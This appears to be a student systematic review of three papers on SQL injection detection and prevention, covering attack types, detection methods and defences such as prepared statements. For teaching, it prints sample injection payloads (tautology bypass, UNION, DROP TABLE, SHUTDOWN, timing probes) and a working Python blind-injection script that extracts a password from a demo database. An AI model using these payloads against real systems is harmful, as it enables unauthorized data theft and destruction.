
Contents

Contents
List of Tables
List of Figures
Abbreviations
Abstract
Keywords
1. Introduction
2. SQL Injection Overview
   2.1. SQLI Attack Process
3. Research Methodology
   3.1. Research Questions
      3.1.1. Research Question 1
      3.1.2. Research Question 2
      3.1.3. Research Question 3
   3.2. Searching Process
      3.2.1. Searching Papers
      3.2.2. Selection Execution
      3.2.3. Quality Assessment and Extracting Information
4. Result and Critique
   4.1. Publication Growth in SQL Injection Detection Field (RQ1)
   4.2. Types of SQL Injection Attacks (RQ2)
   4.3. SQL Injection Detection and Prevention Techniques (RQ3)
      4.3.1. SQL Injection Detection Techniques
      4.3.2. SQL Injection Prevention Techniques
5. Recommendation
6. Conclusion
7. References

List of Tables

Table 1: Searching keywords
Table 2: Quality assessment criteria

List of Figures

Figure 1: SQLI attack process
Figure 2: The filtering process and the number of resultant papers after each step

Abbreviations
P1 – SQLIA Detection and Prevention Techniques by Mazoon Al Rubaiei, Thuraiya Al Yarubi,
Maiya Al Saadi and Basant Kumar
P2 – A Detection and Prevention Technique on SQL Injection Attacks by Zar Chi Su Su Hlaing
and Myo Khaing
P3 – Identification and Mitigation Tool for SQL Injection Attack by W.H. Rankothge, Mohan
Randeniya, Viraj, and Viraj Samaranayaka

Abstract

Web applications are developing rapidly, and most individuals now carry out their daily
transactions on the web: searching for information, banking, purchasing, and managing and
checking transactions. As web applications have become part of everyday activity, the risks
associated with them have grown to a great extent, and the number of threats increases as the
exposure increases. Structured Query Language Injection Attack (SQLIA) is one of the most
serious threats to web applications. A lack of input validation is the vulnerability that leads to
SQL injection attacks on the web. SQLIA is an attack in which crafted input is turned into an
unintended SQL statement in order to abuse database-driven applications. The vulnerability
allows an attacker to supply input that alters the application's interactions with its back-end
database. The attacker can therefore access the database without authorization and enter,
modify or delete critical information. Many techniques have been developed to detect and
mitigate these types of attacks. This paper presents a systematic review of a pool of 3 papers on
SQL injection detection methods for web applications. The pool was selected using a search and
filtering method applied to scholarly databases (IEEE, Science Direct and Research Gate), with
the aim of providing a specific response to several research questions in the area of SQL
injection detection and prevention. This provides a basis for designing and using effective SQL
injection detection methods.

Keywords

SQL Injection Attack, Database Injection, Detection Techniques, Prevention, Mitigation

1. Introduction

Large amounts of sensitive data belonging to companies and organizations are stored in
databases, either on the organization's own servers or off-site. Protecting these data from
unauthorized access is extremely important to organizations in every sector, since any leak will
have a huge impact on the privacy of the users as well as on the reputation and financial
situation of the institution. Data are therefore among the most important assets that must be
preserved and protected, and databases have become the treasuries and pillars of modern
organizations.
Structured Query Language (SQL) is the standard language used to access and manipulate these
databases; it allows database administrators and applications to store, retrieve, create, update
and delete data. SQL databases are widely used in web applications to store site and user data,
and they are accessed through queries built from specific commands. Visitors' actions are
translated into SQL commands that read and update their data, so visitors never interact with
the database directly. Attackers have exploited this very layer and targeted databases to gain
access to data. One of the most common attacks on databases is SQL injection [3]. The first
public description of SQL injection dates to 1998, when Jeff Forristal wrote about how to
infiltrate a Windows NT server; this was the beginning of the discovery of this kind of threat.
This paper systematically reviews three research papers that proposed techniques, algorithms
and frameworks to detect and mitigate the different types of SQL injection attacks on web
applications. It does so by selecting a specific issue, defining the scope of the review, and
selecting scholarly databases (IEEE, Science Direct and Research Gate) in which to search for
related research papers. It then classifies the proposed approaches and analyzes their
performance.

2. SQL Injection Overview

SQL injection is a technique used by attackers to target databases by exploiting vulnerabilities
in web applications. The vulnerability results from insufficient filtering of user-supplied input
[4], which allows the attacker to access, retrieve, modify or delete user data through
illegitimate means.

2.1. SQLI Attack Process

A web-based application follows a three-tier design: a presentation tier (the HTTP web
interface), an application tier and a data tier. A lack of input validation in the application tier
enables a SQLIA, a code injection technique that exploits the data tier: the attacker submits
Structured Query Language (SQL) commands through the presentation tier to gain access to
resources, change data or disrupt the entire database [5].
The SQLI attack process involves the following steps:
a. The attacker supplies SQL fragments through a web application's input fields, hidden
fields or other HTTP parameters.
b. The web application receives the HTTP request from the web client (the attacker), treats
the parameters as input and builds a SQL statement from them by string concatenation. A
malicious user exploiting this SQL injection vulnerability can log in as admin without
knowing the right password by adding a Boolean tautology such as OR 1=1 to the SQL
command, which makes the WHERE condition always true.
c. The application submits the assembled SQL statement to the back-end database server,
and the attacker gains access because the inputs were not sanitized.
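As an added illustration of steps a to c (example code written for this review, not taken from the reviewed papers), the following Python script builds a constructed in-memory SQLite user table, implements the vulnerable login of step b by string concatenation, and places the parameterized form beside it. The table contents, the tautology payload and the function names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data for the example: two accounts in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "hunter2")])
    conn.commit()
    return conn


def build_login_query(username, password):
    # Step b as the vulnerable application does it: untrusted strings are pasted into the
    # SQL text, so a quote in the input ends the literal and the rest becomes SQL.
    return ("SELECT id FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    # Step c: the assembled statement goes to the database unchanged.
    row = conn.execute(build_login_query(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username, password):
    # Hardened form: the SQL text is fixed and the inputs travel as bound values,
    # so a quote or an OR 1=1 in the input is compared as data, never parsed as SQL.
    row = conn.execute("SELECT id FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"   # Boolean tautology from step b, supplied as the password
    print(build_login_query("admin", tautology))
    print("vulnerable login with tautology:", login_vulnerable(db, "admin", tautology))
    print("parameterized login with tautology:", login_parameterized(db, "admin", tautology))
```

The printed query shows why the tautology works: AND binds tighter than OR, so the condition becomes (username='admin' AND password='') OR '1'='1', which is true for every row. A comment-based payload such as admin'-- in the username field bypasses the password check in the same vulnerable function, while the parameterized version treats both payloads as user names that do not exist.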

Figure 1: SQLI attack process

3. Research Methodology

This systematic review includes papers on detection methods and techniques for SQL injection
attacks published during the period 2019 to 2021, found using the following search engines:
IEEE, Science Direct and Research Gate. The filtering process and the number of resultant
papers after each level are shown in Figure 2.

3.1. Research Questions

Research papers included in this systematic review were selected to answer the following
research questions.

Figure 2: The filtering process and the number of resultant papers after each step

3.1.1. Research Question 1

 How has publication grown in the SQL injection detection field?


The purpose of this question is to examine the views of the reviewed research papers on the
significance of the SQL injection attacks, regarding how these attacks are being developed and
the level of severity they have reached during recent years.

3.1.2. Research Question 2

 What types of SQL injection attacks have been discussed?


This question aims to identify the types of SQL injection attacks that each proposed method,
algorithm or framework can handle.

3.1.3. Research Question 3

 What are the proposed methods to detect and mitigate these attacks?
This research question aims to explore the most common and efficient methods that have been
proposed to face each type of attack.

3.2. Searching Process

3.2.1. Searching Papers

The search for related research papers was performed on the IEEE Xplore, Science Direct and
Research Gate digital libraries, covering the publication period from 2019 to 2021, in order to
include the most up-to-date and relevant publications.

The keywords used in the searching process are listed in Table 1 below.

Table 1: Searching keywords

Keywords               Alternative keywords   Keyword combinations
SQL Injection          Database               SQL AND injection AND (detection techniques OR prevention)
Detection Techniques                          SQL AND injection AND (detection techniques OR mitigation)
Mitigation                                    Database AND injection AND (detection techniques OR prevention)
                                              Database AND injection AND (detection techniques OR mitigation)

3.2.2. Selection Execution

A large number of research papers were collected from each search engine through the search
method described above. All the extracted papers were filtered at multiple levels: creating a
CSV file to remove duplicate papers, selection based on the title, selection based on the
abstract, and selection based on the quality assessment questions and full-text analysis. These
levels are explained as follows:
Level 1. Removing Duplications: The searches on the three engines, using the strings in Table 1,
returned a total of 813 papers: 73 from IEEE, 640 from Science Direct and 100 from Research
Gate. A CSV file was used to filter duplicates among these papers, removing 6 duplicate papers.
Level 2. Title Selection: At this level, the papers from level 1 were filtered by evaluating their
titles and determining how relevant they are to the research questions. The first author
nominated the papers extracted from IEEE and the second author nominated those extracted
from Science Direct and Research Gate. This resulted in 172 papers.
Level 3. Abstract & Full-Text Analysis Selection: The 172 papers were then filtered again by
reading their abstracts and judging their relevance to the research questions. Papers whose
abstracts did not propose any specific mitigation technique were removed. This resulted in 13
research papers.
Level 4. Quality Assessment Questions: Finally, each of the 13 papers was assessed against the
quality assessment questions and 7 papers were selected. Of these seven, 3 papers were
reviewed in depth in this report.

3.2.3. Quality Assessment and Extracting Information

Quality assessment aims to evaluate the papers and determine their level of quality. Each paper
is checked against 7 assessment questions, scoring one point for each question answered
positively. The quality level of the paper is determined from the cumulative score. Table 2 shows
the quality assessment criteria developed for this purpose.

Table 2: Quality assessment criteria


#    Question
Q1   Does the title of the paper clarify the idea of the research?
Q2   Does the abstract explain the objectives of the research?
Q3   Does the writer follow the systematic/standard arrangement of the research paper?
Q4   Does the paper use a mechanism, technique, or methodology?
Q5   Does the paper specify the type of the SQL injection attack?
Q6   Does the proposed approach succeed in detecting/mitigating SQL injection attacks?
Q7   Are the results/evaluations shown conclusively in the paper?

4. Result and Critique

4.1. Publication Growth in SQL Injection Detection Field (RQ1)

The answer to this question relates to the motivation behind each approach and to how security
concerns have become important in developing secure web applications in recent years. This is
indicated by the number of publications on SQL injection and web application attack detection
during the period 2019–2021. We found that the number of articles discussing SQL injection
attacks increased over these three years, from 2019 to 2021.

4.2 Types of SQL Injection Attacks (RQ2)

All three papers attempt to enumerate and define the possible types of SQLIA, with a specific
example for each attack type. Paper 1 lists 8 types of SQLIA: Tautologies, Illegal/Logically
Incorrect Queries, Union Query, Piggy-backed Queries, Stored Procedures, Alternate Encodings,
Timing Attacks and Blind Injection.

In brief, with the example queries given in paper 1:
• Tautologies: gain access to the application without supplying a valid user name, by making
the WHERE clause always true. E.g.
SELECT Emp_NO FROM Employee WHERE username='' OR '1'='1' AND password='';
• Illegal/Logically Incorrect Queries: reveal information about the database in use from the
returned error messages or logical errors. E.g.
SELECT Emp_id FROM Employee WHERE username='xyz' AND password=!@#$%^&*
• Union Query: disclose sensitive information by appending a second query with the UNION set
operator. E.g.
SELECT Salary_info FROM Employee WHERE username='abc' AND password='' UNION SELECT
Salary_info FROM Employee WHERE Emp_id='1234';
• Piggy-backed Queries: append an additional statement that deletes or alters information with
harmful intent. E.g.
SELECT Salary_info FROM Employee WHERE username='abc' AND password=''; DROP TABLE user;
• Stored Procedures: gain access to the host operating system or the database server by
executing a built-in command. E.g.
SELECT Salary_info FROM Employee WHERE username='abc' AND password=''; SHUTDOWN
• Alternate Encodings: hide the attacker's pattern from filters by using alternate encodings
such as hexadecimal or ASCII. E.g. (the char() argument is the hexadecimal encoding of
"shutdown")
SELECT Salary_info FROM Employee WHERE username='abc' AND password='';
exec(char(0x73687574646f776e))
• Timing Attacks: infer data from the delay in the database's response, using the WAITFOR
keyword. E.g.
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & (power(2, 0)))
> 0 waitfor delay '0:0:5'
• Blind Injection: take advantage of applications that hide error messages by asking a series of
logical questions through SQL statements and comparing the responses. E.g.
SELECT pass FROM userTable WHERE username='user' AND 1=0 -- AND pass='' AND pin=0
SELECT pass FROM userTable WHERE username='user' AND 1=1 -- AND pass='' AND pin=0
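The Inference class (Blind Injection and Timing Attacks in paper 1's list) is the hardest to picture from a single query, so here is an added example, written for this review and not taken from the reviewed papers, of a Boolean-based blind extraction against a constructed SQLite table. The application reveals only whether a user exists; the attacker turns that single bit into a series of logical questions (is the code of character N of the password greater than M?) and recovers the value by binary search. The table contents, column names and function names are assumptions made for the example.

```python
import sqlite3


def make_target():
    """Constructed sample data for the example (not from the reviewed papers)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'hunter2');
    """)
    return conn


class BlindOracle:
    """Vulnerable 'does this user exist?' endpoint: it concatenates the input into SQL
    and leaks exactly one bit (found / not found). It also counts the queries sent."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def user_exists(self, username):
        self.queries += 1
        sql = "SELECT 1 FROM users WHERE username='%s'" % username
        return self.conn.execute(sql).fetchone() is not None


def extract_column(oracle, victim, column, max_len=64):
    """Blind injection: recover users.<column> for <victim> one character at a time.
    Each probe is a yes/no question; the trailing -- comments out the closing quote."""
    secret = ""
    for pos in range(1, max_len + 1):
        # Is there a character at this position at all? If not, the value is complete.
        if not oracle.user_exists("%s' AND length(%s)>=%d --" % (victim, column, pos)):
            break
        lo, hi = 0, 127                     # the answer is a 7-bit code within [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "%s' AND unicode(substr(%s,%d,1))>%d --" % (victim, column, pos, mid)
            if oracle.user_exists(probe):   # code > mid
                lo = mid + 1
            else:                           # code <= mid
                hi = mid
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    oracle = BlindOracle(make_target())
    print("recovered:", extract_column(oracle, "admin", "password"))
    print("queries used:", oracle.queries)
```

Seven characters cost 8 queries each (one length probe plus seven halvings of the 128-value range) and one final length probe, 57 requests in total, which is why blind injection shows up in logs as a burst of near-identical requests differing only in a numeric comparison. A timing attack is the same procedure with the true/false answer carried by a delay instead of by page content.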
The second paper classifies SQLIA types into six: Tautologies, Malformed Queries, Union Query,
Piggy-backed Queries, Inference and Stored Procedures. Four of these have the same name and
definition as in paper 1. Malformed Queries corresponds to paper 1's Illegal/Logically Incorrect
Queries, and Inference is a single category that contains both the Timing Attack and Blind
Injection types of paper 1. The two papers therefore agree on the attack types, both in their
definitions and in their examples. The third paper, instead of listing all types of SQLIA, points
out a gap in the other approaches and relies on keyword randomization: a random integer is
appended to each normal SQL keyword, and a proxy acting as a parser sits between the web
server and the database, intercepts the randomized query and decodes it into proper SQL before
sending it to the database. The focus of this third paper is on identification and mitigation of
the attacks. Taken together, the three papers identify and classify all the commonly recognized
types of SQLIA.

4.3 SQL Injection Detection and Prevention Techniques (RQ3)

4.3.1 SQL Injection Detection Techniques

SQL injection attack detection techniques are clearly defined in all three papers. Paper 1
classifies its detection techniques into 3 major categories, and in this review we use paper 1's
categories to group the methods of all three papers. Even though the other two papers do not
state those categories, their detection ideas fit the same broad groups. For example, to detect
whether a developed web application is exposed to SQLIA, paper 3 uses its WebMIV tool to
inject every input field with SQLIA payloads; if an injection succeeds, the field is vulnerable
and is passed to the prevention technique, otherwise the application is considered secure. All
of these actions take place in the development phase, so the detection technique of paper 3 is
categorized as a static technique.

4.3.2 SQL Injection Prevention Techniques

The previous section listed the possible types of attacks covered by the 3 papers. This section
lists the prevention techniques for SQLIA that they cover, starting with paper 1:
• Input and URL Validation: avoid attacks through input fields and URLs by checking the input
format, input length, input range and the exact set of characters allowed. Input outside those
rules is rejected.
• Data Sanitization: remove from the data any characters that are not needed; in particular, it
ensures that the username and password do not include apostrophes and contain only valid
characters. The preferred way is to use regular expressions to remove unwanted characters,
since regular expressions are well suited to string parsing and pattern matching, and the same
check must be applied to hidden fields, inactive fields and cookies.
• Prepared Statement for Query Execution: a prepared statement is very effective against SQL
injection because the parameter values are transmitted separately from the SQL text and
therefore never need to be escaped.
• Query and Session Tokenization: this approach converts the input query into tokens. It uses
arrays to store the tokens of the original (expected) query and of the query actually built at
run time. The array length is the decisive check: if the lengths do not match, the query has
been injected; otherwise the query is safe and normal. All the strings before a single quote, a
double dash or a space form a token. In this approach the main query and the injected query
are treated differently.
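To make the Query and Session Tokenization check concrete, here is an added example written for this review (not code from paper 1): it tokenizes a login query at the delimiters the technique names (single quote, double dash, whitespace) and flags a request when the token count differs from that of a benign query built from the same template. The query template and the inputs are assumptions made for the example. It also shows two limits a practitioner should know about: a comment-based payload such as admin'-- produces the same token count as a benign request and is missed, while a legitimate value containing a space is flagged.

```python
import re

# Delimiters named by the technique: a token is the text before a single quote,
# a double dash or whitespace. The delimiters themselves are discarded.
DELIMITERS = re.compile(r"'|--|\s+")


def tokenize(query):
    """Split a SQL string into the technique's tokens, dropping empty pieces."""
    return [tok for tok in DELIMITERS.split(query) if tok]


def build_query(username, password):
    # Assumed application template: the vulnerable concatenation the check is meant to guard.
    return "SELECT id FROM users WHERE username='%s' AND password='%s'" % (username, password)


# Token count of a benign request with one-word values; computed once per query template
# and compared against every run-time query built from that template.
BASELINE = len(tokenize(build_query("user", "pass")))


def is_injected(username, password):
    """The paper's rule: a different array length means the query was injected."""
    return len(tokenize(build_query(username, password))) != BASELINE


if __name__ == "__main__":
    samples = [("alice", "hunter2"),        # benign
               ("' OR '1'='1", "x"),         # tautology: extra tokens, caught
               ("admin'--", "x"),            # comment payload: same count, missed
               ("alice smith", "x")]         # benign value with a space: false positive
    for user, pw in samples:
        query = build_query(user, pw)
        print(len(tokenize(query)), is_injected(user, pw), query)
```

The tautology adds OR, 1, = and 1 as tokens and is caught, but admin'-- is not: its quote and double dash are delimiters, so they vanish from the array and the count matches the baseline even though the password check has been commented out. Keeping the comment marker as a token, or comparing the token sequence rather than only the count, would close that gap; the false positive on values with spaces shows why the check belongs beside parameterized queries rather than in place of them.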
Paper 2 covers the same prevention techniques as papers 1 and 3 ("Prepared Statement" and
"Validating User Input" are defined in the same manner as in paper 1) and adds the following:
• Stored Procedures: a stored procedure is written and stored in the database server and then
called from the web application. If user access to the database is allowed only through stored
procedures, users do not need to be granted permission on any database table directly, so the
database remains protected.
• Encrypting Data: encrypting stored values prevents the attacker from reading sensitive data,
and any further changes made to the database would have no useful effect.
• Limiting Privileges: the account used to authenticate the application to the database should
have limited privileges, so as to limit the extent of the damage in the event of a SQL
injection.
The 3rd paper recommends two prevention techniques, user input validation and parameterized
queries, to prevent SQLIA, supported by its proposed WebMIV tool.

5. Recommendation
Our team evaluated all three papers based on their own detection, prevention and mitigation
techniques. All of them present new techniques to secure applications, but apart from paper 3,
the other 2 papers do not propose a standard, reusable tool for future use. Not every developer
is aware of SQLIA well enough to identify the attack and protect against it using those papers
alone, so a tool to test and verify whether a system is secure or not would be very important.
Our final recommendation is that, instead of enumerating every exposure and finding a
prevention technique for every attack, it is better to focus on a common pattern that rejects
any input making a condition always true and accepts only predefined input formats. In the
current era, new types of SQLIA may be created overnight, so it is not feasible to counter every
threat individually.

6. Conclusion
Our team analyzed a total of 3 research papers and reviewed a comparison of different
techniques for detecting and preventing SQLIAs. First, we identified the different types of SQLI
attacks from the papers. Then, based on the types of attacks, we evaluated effective techniques
for detecting and preventing them. We collected from the papers the different mechanisms
through which SQLIAs can be introduced into an application and identified which techniques
were able to handle which mechanisms; in particular, Java static tainting and stored procedures
are the most powerful approaches for handling SQLI attacks. Based on our evaluation we found
several general trends across the three papers, especially in "Mazoon Al Rubaiei et al.".
We found a general distinction in prevention abilities between prevention-focused techniques
and general detection-and-prevention techniques. Future evaluation work should focus on
evaluating the techniques' precision and effectiveness in practice.

7. References

1. C. Győrödi, R. Győrödi, G. Pecherle and A. Olah, "A comparative study: MongoDB vs.
MySQL," in 2015 13th International Conference on Engineering of Modern Electric Systems
(EMES), Oradea, Romania, 2015, pp. 1–6.
2. H. Matallah, G. Belalem and K. Bouamrane, "Comparative study between the MySQL
relational database and the MongoDB NoSQL database," International Journal of Software
Science and Computational Intelligence (IJSSCI), vol. 13, no. 3, pp. 38–63, 2021.
3. I. Lee, S. Jeong, S. Yeo and J. Moon, "A novel method for SQL injection attack detection
based on removing SQL query attribute values," Mathematical and Computer Modelling,
vol. 55, no. 1–2, pp. 58–68, 2012.
4. A. Sadeghian, M. Zamani and S. Ibrahim, "SQL injection is still alive: A study on SQL
injection signature evasion techniques," in 2013 International Conference on Informatics
and Creative Multimedia, Kuala Lumpur, Malaysia, 2013, pp. 265–268.
5. J. Wang, R. C. Phan, J. N. Whitley and D. J. Parish, "Augmented attack tree modeling of
SQL injection attacks," in 2010 2nd IEEE International Conference on Information
Management and Engineering, vol. 4, 2010, pp. 182–186.
6. M. Kumar and L. Indu, "Detection and prevention of SQL injection attack," International
Journal of Computer Science and Information Technologies, vol. 5, no. 1, pp. 374–377,
2014.
7. A. Gupta and S. K. Yadav, "An approach for preventing SQL injection attack on web
application," International Journal of Computer Science and Mobile Computing, vol. 5,
no. 6, pp. 1–10, June 2016.
8. W. G. J. Halfond and A. Orso, "Detection and prevention of SQL injection attack," Georgia
Institute of Technology.
9. Sonakshi, R. Kumar and G. Gopal, "Case study of SQL injection attacks," International
Journal of Engineering Science & Research Technology, pp. 176–189, July 2016.
10. Z. S. Alwan and M. F. Younis, "Detection and prevention of SQL injection attack: A survey,"
International Journal of Computer Science and Mobile Computing, vol. 6, no. 8, pp. 5–17,
August 2017.

